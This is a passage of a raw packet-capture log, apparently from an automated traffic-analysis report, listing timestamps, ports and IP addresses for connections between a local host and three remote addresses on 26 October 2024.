Oct 26, 2024 07:27:15.959181070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959196091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959203959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.959211111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959223986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.959233999 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.959239006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959255934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.959255934 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.959280968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.959295034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.964611053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.964627028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:15.964664936 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.964696884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:15.997348070 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.003662109 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.122015953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122042894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122057915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122075081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122097969 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.122138977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.122179985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122196913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122221947 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.122222900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122240067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122243881 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.122263908 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.122276068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.122944117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122968912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.122986078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.123003006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.123019934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.123027086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.123027086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.123027086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.123039961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.123059988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.207170010 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:16.241540909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.241568089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.241588116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.241609097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.241631985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.241657019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.241682053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.241898060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.241936922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.241938114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.241952896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.241990089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.242005110 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.242005110 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.242006063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.242028952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.242037058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.242758036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.242800951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.261704922 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:16.278253078 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.278311968 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.278325081 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.278327942 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.278347969 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.278350115 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.278373003 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.278393030 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.278636932 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.278678894 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.278713942 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.278729916 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.278753042 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.278757095 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.278773069 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.278791904 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.279608965 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.279634953 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.279649973 CEST	80	49950	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:16.279665947 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.279691935 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.285505056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.285526037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.285589933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.292310953 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.292334080 CEST	49950	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:16.357196093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357211113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357222080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357295990 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.357342005 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.357351065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357373953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357392073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.357403994 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.357553959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357599974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.357603073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357615948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357642889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.357655048 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.357939959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357949972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.357985973 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.357997894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.358159065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.358171940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.358184099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.358206987 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.358217955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.358258963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.358299971 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.358784914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.358794928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.358844042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.445027113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.445041895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.445101976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.465678930 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:16.474781990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.474796057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.474888086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.474986076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475001097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475012064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475028038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.475054979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.475125074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475182056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475187063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475305080 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.475541115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475554943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475567102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475579023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.475583076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.475606918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.475631952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.476053953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.476099968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.476103067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.476139069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.476269007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.476281881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.476293087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.476313114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.476330042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.476337910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.511702061 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:16.562788963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.562860966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.562931061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.592576027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.592593908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.592621088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.592628002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.592643976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.592663050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.592729092 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.592879057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.592895985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.592911959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.592952967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.592952967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.593245029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.593259096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.593275070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.593291998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.593302011 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.593327045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.593671083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.593688011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.593703032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.593729019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.593754053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.594017029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.594031096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.594109058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.692274094 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:16.904444933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904532909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904544115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904555082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904565096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904571056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904572010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904576063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904589891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904597998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904603004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904616117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904629946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904654026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904681921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904694080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904705048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904723883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904731035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904738903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904774904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904870987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904881954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904894114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904906988 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.904926062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.904953003 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.905739069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.905787945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.905853987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.905867100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.905900955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.906771898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906785011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906795979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906806946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906819105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906824112 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.906857967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.906874895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.906896114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906908035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906918049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906928062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.906929016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906940937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906951904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906954050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.906964064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906975985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.906981945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.906987906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.907001972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.907016993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.907028913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.907030106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.907058001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.907084942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.907234907 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:16.907305002 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:16.913897991 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:16.914195061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.914239883 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.914344072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.914361000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.914395094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.914408922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.946156979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.946171999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.946182013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.946213007 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.946228027 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.946285009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.946296930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.946315050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.946322918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.946336985 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.946351051 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.946470976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.946502924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.946542025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.946970940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947110891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.947133064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947294950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947307110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947323084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947336912 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.947336912 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.947357893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.947613955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947633982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947642088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947648048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:16.947670937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:16.947700977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.031332970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.031344891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.031351089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.031397104 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.031423092 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.063936949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.063951015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.063956976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.063966990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.063973904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.063980103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.064069986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.064069986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.064255953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.064263105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.064312935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.064423084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.064430952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.064435959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.064441919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.064471960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.064496040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.065318108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.065565109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.065587044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.065627098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.105920076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.105930090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.105942011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.106044054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.148964882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.148972034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.148983955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.149029970 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.181421041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181466103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181473017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181523085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181529045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181541920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181612968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.181638956 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.181788921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181855917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181863070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181905985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181911945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.181912899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181927919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.181958914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.182641983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.182687998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.222822905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.222841978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.222847939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.222955942 CEST	49982	80	192.168.2.7	185.215.113.84
